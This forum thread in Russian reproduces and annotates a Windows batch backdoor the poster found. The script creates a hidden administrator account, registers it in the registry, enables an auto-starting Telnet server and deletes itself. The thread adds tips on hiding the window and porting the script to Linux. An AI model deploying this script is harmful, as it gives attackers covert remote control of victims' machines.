Интересный батник
Модератор: mike 1
Интересный батник
Мне попался интересный бэкдор, построен на стандартных средствах Windows. Не знаю, можно ли его назвать в таком случае вирусом, но он позволяет удаленно управлять устройством через протокол Telnet, а точнее получить доступ к терминалу. Также на него не реагируют антивирусы, так как он является пакетным файлом.
Вот сам "вирус":
Рассчитан он на запуск от имени администратора и во время выполнения минуты 2 висит окно cmd. Конечно, это можно "профиксить" с помощью vbs.
И для атаки злоумышленнику нужен IP, так что думаю атака была направленной. Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.
Вот сам "вирус":
Код: Выделить всё
1. @echo off -- отключение вывода на экран
2. chcp 866 -- изменение кодировки страницы на 866
3. net user Name Password /add -- создание учётной записи для протокола Telnet
4. net localgroup Ђ¤¬ЁЁбва в®ал Name /add -- насколько я понял, это добавление в группу администраторов
5. net accounts /maxpwage:unlimited -- строк действия учётной записи
6. reg add "HKLM\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\
SpecialAccounts\UserList" /v Name /t REG_DWORD /d 0 /f -- специальная учётная запись
7. start "" /W pkgmgr /iu: "TelnetServer" -- установка службы Telnet
8. ::tlntadmn config port=8080 sec=-NTLM --редирект на другой порт (видимо для противостояния роутерам)
9. net localgroup "TelnetClients" Name /add --добавление учётки в группу Telnet
10. sc config tlntsvr start = auto -- автозапуск
11. net start telnet -- запуск службы
12. del %0 -- самоуничтожение
И для атаки злоумышленнику нужен IP, так что думаю атака была направленной. Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.
- DesignerMix
- Администратор
- Сообщения: 6667
- Зарегистрирован: 25 апр 2014, 10:51
- Откуда: Белгород
- Контактная информация:
Интересный батник
А почему антивирус должен был на него реагировать? Ведь в выполняемых командах нет ничего необычного, например какой-нибудь администратор вполне может написать подобный для удобства подключения к удаленным машинам.
Спасибо за интересную информацию!
-
- Хранитель файлового архива
- Сообщения: 94
- Зарегистрирован: 26 апр 2014, 20:59
- Контактная информация:
Интересный батник
Пользуйтесь linux или не пользуйтесь администраторской учётной записью в windows повсеместно. 

В файловом архиве есть много схем ноутбуков и скоро будут добавляться другие полезные файлы. Заходите - http://www.dmyt.ru/forum/downloads.php
Интересный батник
А я разве писал что это бэкдор для Windows? В UNIX'ах тоже есть Telnet, а вообще протокол создан для удаленного кроссплатформенного управления, так что использование Linux вас не спасёт.
Отправлено спустя 16 минут 1 секунду:
Конечно, именно этот код работать не будет, но всё же его можно переработать и для Linux
- Endless8Space
- Модератор
- Сообщения: 576
- Зарегистрирован: 15 ноя 2014, 18:23
- Откуда: Омск
Интересный батник
Я имел ввиду что можно реализовать "блокнотом", а служба Telnet, через которую и реализуется управление, есть и на линуксе.
Отправлено спустя 1 минуту 20 секунд:
И я же написал что можно написать (переделать) под Linux, так в чём проблема?
Отправлено спустя 1 минуту 20 секунд:
И я же написал что можно написать (переделать) под Linux, так в чём проблема?
- Endless8Space
- Модератор
- Сообщения: 576
- Зарегистрирован: 15 ноя 2014, 18:23
- Откуда: Омск
Интересный батник
Stinger, можно - можно переработать. Никаких проблем)
- Denis Akima
- Новичок
- Сообщения: 1
- Зарегистрирован: 27 авг 2015, 12:40
- Контактная информация:
Интересный батник
Stinger, можно уточнить четвёртую строку? У меня она некоректно отображается "4. net localgroup Ђ¤¬ЁЁбва в®ал Name /add "
- DesignerMix
- Администратор
- Сообщения: 6667
- Зарегистрирован: 25 апр 2014, 10:51
- Откуда: Белгород
- Контактная информация:
Интересный батник
Здесь написано Администраторы. Автор темы кстати в комментариях к данной строке это и указал
-- насколько я понял, это добавление в группу администраторов
Кто сейчас на конференции
Сейчас этот форум просматривают: нет зарегистрированных пользователей и 0 гостей